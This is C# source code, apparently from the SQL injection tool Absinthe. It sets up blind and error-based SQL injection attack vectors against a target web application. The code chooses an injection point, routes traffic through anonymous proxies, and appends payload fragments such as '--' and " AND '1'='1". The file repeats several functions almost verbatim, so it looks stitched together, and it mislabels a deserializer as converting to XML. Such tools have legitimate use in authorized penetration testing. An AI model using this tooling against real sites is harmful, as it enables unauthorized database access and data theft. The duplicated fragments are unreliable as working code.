/// <summary>
/// Converts the Attack Vector from the native type to XML
/// </summary>
/// <param name="xInput">The XML node to start deserialization</param>
/// <param name="AnonProxies">Any anonymous proxies being used</param>
public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
{
string FullUrl;
if (!_UseSSL)
{
FullUrl = "http://" + _TargetURL;
}
else
{
FullUrl = "https://" + _TargetURL;
}
XmlNode n = xInput.SelectSingleNode("attackvector");
if (n == null)
{
return;
}
InjectionOptions opts;
if (_IsBlind)
{
opts = new BlindInjectionOptions();
((BlindInjectionOptions)opts).Delimiter = _FilterDelimiter;
((BlindInjectionOptions)opts).Tolerance = _Tolerance;
((BlindInjectionOptions)opts).Throttle = _ThrottleValue;
}
else
{
opts = new ErrorInjectionOptions();
}
opts.TerminateQuery = _TerminateQuery;
opts.WebProxies = AnonProxies;
AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
_TargetAttackVector = avf.BuildFromXml(n, opts, _Plugins.GetPluginByName(_LoadedPluginName));
_TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
}
private void InitializeAttackVectors()
{
string URL;
URL = ctlConnection1.UseSsl == true ? "https://" : "http://";
URL += ctlConnection1.TargetUrl;
string Method = ctlConnection1.ConnectMethod;
if (Method.Equals("")) return;
SafelyChangeCursor(Cursors.WaitCursor);
// Generate StringDict
string TargetName, TargetField;
bool InjectAsString;
TargetName = String.Empty; TargetField = String.Empty;
NameValueCollection Others = new NameValueCollection();
NameValueCollection Cookies = new NameValueCollection();
Others = FormParameters.FormParameters(ref TargetName, ref TargetField, out InjectAsString);
Cookies = FormParameters.Cookies;
if (TargetName.Equals(String.Empty))
{
UserStatus("No Injection Point Found");
SafelyChangeCursor(Cursors.Default);
return;
}
UserStatus("Beginning Preliminary Scan");
try
{
SafelyChangeEnableOfControl(butInitializeInjection, false);
AttackVectorFactory avf;
InjectionOptions opts;
if (optBlindInjection.Checked == true)
{
opts = new BlindInjectionOptions();
((BlindInjectionOptions)opts).Tolerance = _AbsintheState.FilterTolerance;
((BlindInjectionOptions)opts).Delimiter = _AbsintheState.FilterDelimiter;
}
else
{
opts = new ErrorInjectionOptions();
((ErrorInjectionOptions)opts).VerifyVersion = chkVerifyVersion.Checked;
}
opts.TerminateQuery = _AbsintheState.TerminateQuery;
opts.Cookies = Cookies;
opts.WebProxies = _AppSettings.ProxyQueue();
opts.InjectAsString = InjectAsString;
opts.UserAgent = _AbsintheState.UserAgent;
opts.AuthCredentials = ctlUserAuth1.NetworkCredential;
opts.AppendedQuery = _AbsintheState.AppendedText;
avf = new AttackVectorFactory(URL, TargetName, TargetField, Others, Method, opts);
avf.UserStatus += new UserEvents.UserStatusEventHandler(UserStatus);
int PluginNumber = Array.IndexOf(_PluginEntries, _AbsintheState.LoadedPluginName);
IPlugin pt = null;
if (optBlindInjection.Checked)
{
foreach (IPlugin bp in _AbsintheState.PluginList)
{
if (bp.GetType().GetInterface("IBlindPlugin") != null)
{
if (bp.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
{
pt = (IPlugin)bp;
break;
}
}
}
_AbsintheState.TargetAttackVector = avf.BuildBlindSqlAttackVector(_AbsintheState.FilterTolerance, (IBlindPlugin)pt);
UserStatus("Finished initial scan");
}
else if (optErrorBasedInjection.Checked)
{
if (PluginNumber <= 0)
{
pt = AutoDetectPlugin(avf);
}
else
{
foreach (IPlugin ep in _AbsintheState.PluginList)
{
if (ep.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
{
pt = (IPlugin)ep;
break;
}
}
}
if (pt != null)
{
try
{
_AbsintheState.TargetAttackVector = avf.BuildSqlErrorAttackVector((IErrorPlugin)pt);
UserStatus("Finished initial scan");
}
catch (UnsupportedSQLErrorVersionException sqlex)
{
ErrorReportingDelegate ts = new ErrorReportingDelegate(ThreadUnsafeDisplayErrorReportDialog);
this.Invoke(ts, new object[] { sqlex.VersionErrorPageHtml, sqlex.HavingErrorPageHtml });
}
}
}
}
catch (Exception e)
{
System.Diagnostics.Debug.WriteLine(e.ToString());
UserStatus(e.Message);
}
finally
{
SafelyChangeEnableOfControl(butInitializeInjection, true);
SafelyChangeCursor(Cursors.Default);
}
}
private BlindSqlAttackVector DeserializeBlindSqlAttackVectorXml(XmlNode VectorNode, BlindInjectionOptions opts, IBlindPlugin PluginUsed)
{
double[] TrueSig = null, FalseSig = null;
int[] TrueFilter = null, FalseFilter = null;
foreach (XmlNode n in VectorNode.ChildNodes)
{
switch (n.Name)
{
case "truepage":
//_ParentOutput("Deserializing True signature.. ");
TrueSig = ExtractSignatureFromXml(n);
break;
case "falsepage":
//_ParentOutput("Deserializing False signature.. ");
FalseSig = ExtractSignatureFromXml(n);
break;
case "truefilter":
//_ParentOutput("Deserializing True Filter.. ");
TrueFilter = ExtractFilterFromXml(n);
break;
case "falsefilter":
//_ParentOutput("Deserializing False filter.. ");
FalseFilter = ExtractFilterFromXml(n);
break;
}
}
if (TrueSig == null || FalseSig == null || TrueFilter == null || FalseFilter == null)
{
return(null);
}
string Name = String.Empty;
string Buffer = String.Empty;
if (VectorNode.Attributes["Delimiter"] != null)
{
((BlindInjectionOptions)opts).Delimiter = VectorNode.Attributes["Delimiter"].InnerText;
}
if (VectorNode.Attributes["tolerance"] != null)
{
opts.Tolerance = System.Single.Parse(VectorNode.Attributes["tolerance"].InnerText);
}
if (VectorNode.Attributes["name"] != null)
{
Name = VectorNode.Attributes["name"].InnerText;
}
if (VectorNode.Attributes["buffer"] != null)
{
Buffer = VectorNode.Attributes["buffer"].InnerText;
}
if (VectorNode.Attributes["InjectAsString"] != null)
{
opts.InjectAsString = System.Boolean.Parse(VectorNode.Attributes["InjectAsString"].InnerText);
}
return(new BlindSqlAttackVector(_TargetURL, Name, Buffer, _AttackParams, _Method, PluginUsed, TrueSig, FalseSig, TrueFilter, FalseFilter, opts));
}
///<summary>Public constructor for instantiation.</summary>
///<param name="URL">The URL of the target web application, including file path</param>
///<param name="VectorName">The name of the parameter to use as the injection point</param>
///<param name="VectorBuffer">The default value to store in the injectable parameter</param>
///<param name="AdditionalParams">All parameters (names and values) that are used, but not chosen as injection points</param>
///<param name="Method">The HTTP connection method. This can be "GET" or "POST"</param>
///<param name="PluginUsed">The Plugin being used for the connection</param>
///<param name="TruePage">The signature for the page representing a "true" value</param>
///<param name="FalsePage">The signature for the page representing a "false" value</param>
///<param name="TrueFilterIn">The indices of the signature relevant for comparing an unknown to the true signature</param>
///<param name="FalseFilterIn">The indices of the signature relevant for comparing an unknown to the false signature</param>
///<param name="Options">The InjectionOptions to use for all requests</param>
public BlindSqlAttackVector(string URL, string VectorName, string VectorBuffer, NameValueCollection AdditionalParams, string Method, IBlindPlugin PluginUsed,
double[] TruePage, double[] FalsePage,
int[] TrueFilterIn, int[] FalseFilterIn, BlindInjectionOptions Options)
{
_ConnectViaPost = String.Equals(Method.ToUpper(), "POST");
_TargetURL = URL;
_VectorName = VectorName;
_VectorBuffer = VectorBuffer;
_Options = Options;
_PluginData = PluginUsed;
if (_Options.InjectAsString) _VectorBuffer += "'";
_AttackParams = AdditionalParams;
TruePageSignature = TruePage;
FalsePageSignature = FalsePage;
TrueFilter = TrueFilterIn;
FalseFilter = FalseFilterIn;
_VectorPostBuffer = String.Empty;
if (_Options.TerminateQuery)
{
_VectorPostBuffer += "--";
}
else if (_Options.AppendedQuery.Length > 0)
{
_VectorPostBuffer += _Options.AppendedQuery;
}
else if (_Options.InjectAsString)
{
_VectorPostBuffer = " AND '1'='1";
}
_VectorBuffer += " "; // Required so plugins aren't required to add the spaces
_Proxies = Options.WebProxies;
ParsePage.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
}
///<summary>Public constructor for instantiation.</summary>
///<param name="URL">The URL of the target web application, including file path</param>
///<param name="VectorName">The name of the parameter to use as the injection point</param>
///<param name="VectorBuffer">The default value to store in the injectable parameter</param>
///<param name="AdditionalParams">All parameters (names and values) that are used, but not chosen as injection points</param>
///<param name="Method">The HTTP connection method. This can be "GET" or "POST"</param>
///<param name="PluginUsed">The Plugin being used for the connection</param>
///<param name="Options">The InjectionOptions to use for all connections</param>
public BlindSqlAttackVector(string URL, string VectorName, string VectorBuffer, NameValueCollection AdditionalParams, string Method, IBlindPlugin PluginUsed,
BlindInjectionOptions Options)
{
_Proxies = Options.WebProxies;
if (PluginUsed == null) UserStatus("Null plugin");
_PluginData = PluginUsed;
_Options = Options;
_ConnectViaPost = String.Equals(Method.ToUpper(), "POST");
_TargetURL = URL;
_VectorName = VectorName;
_VectorBuffer = VectorBuffer;
if (_Options.InjectAsString) _VectorBuffer += "'";
_AttackParams = AdditionalParams;
ParsePage.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
//Initialize();//URL, VectorName, VectorBuffer, AdditionalParams, Method);
}
private BlindSqlAttackVector DeserializeBlindSqlAttackVectorXml(XmlNode VectorNode, BlindInjectionOptions opts, IBlindPlugin PluginUsed)
{
double[] TrueSig = null, FalseSig = null;
int[] TrueFilter = null, FalseFilter = null;
foreach (XmlNode n in VectorNode.ChildNodes)
{
switch (n.Name)
{
case "truepage":
//_ParentOutput("Deserializing True signature.. ");
TrueSig = ExtractSignatureFromXml(n);
break;
case "falsepage":
//_ParentOutput("Deserializing False signature.. ");
FalseSig = ExtractSignatureFromXml(n);
break;
case "truefilter":
//_ParentOutput("Deserializing True Filter.. ");
TrueFilter = ExtractFilterFromXml(n);
break;
case "falsefilter":
//_ParentOutput("Deserializing False filter.. ");
FalseFilter = ExtractFilterFromXml(n);
break;
}
}
if (TrueSig == null || FalseSig == null || TrueFilter == null || FalseFilter == null) return null;
string Name = String.Empty;
string Buffer = String.Empty;
if (VectorNode.Attributes["Delimiter"] != null) ((BlindInjectionOptions) opts).Delimiter = VectorNode.Attributes["Delimiter"].InnerText;
if (VectorNode.Attributes["tolerance"] != null) opts.Tolerance = System.Single.Parse(VectorNode.Attributes["tolerance"].InnerText);
if (VectorNode.Attributes["name"] != null) Name = VectorNode.Attributes["name"].InnerText;
if (VectorNode.Attributes["buffer"] != null) Buffer = VectorNode.Attributes["buffer"].InnerText;
if (VectorNode.Attributes["InjectAsString"] != null) opts.InjectAsString = System.Boolean.Parse(VectorNode.Attributes["InjectAsString"].InnerText);
return new BlindSqlAttackVector(_TargetURL, Name, Buffer, _AttackParams, _Method, PluginUsed, TrueSig, FalseSig, TrueFilter, FalseFilter, opts);
}
/// <summary>
/// Converts the Attack Vector from the native type to XML
/// </summary>
/// <param name="xInput">The XML node to start deserialization</param>
/// <param name="AnonProxies">Any anonymous proxies being used</param>
public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
{
string FullUrl;
if (!_UseSSL) FullUrl = "http://" + _TargetURL;
else FullUrl = "https://" + _TargetURL;
XmlNode n = xInput.SelectSingleNode("attackvector");
if (n == null) return;
InjectionOptions opts;
if (_IsBlind)
{
opts = new BlindInjectionOptions();
((BlindInjectionOptions) opts).Delimiter = _FilterDelimiter;
((BlindInjectionOptions) opts).Tolerance = _Tolerance;
((BlindInjectionOptions) opts).Throttle = _ThrottleValue;
}
else
opts = new ErrorInjectionOptions();
opts.TerminateQuery = _TerminateQuery;
opts.WebProxies = AnonProxies;
AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
_TargetAttackVector = avf.BuildFromXml(n, opts, _Plugins.GetPluginByName(_LoadedPluginName));
_TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
}
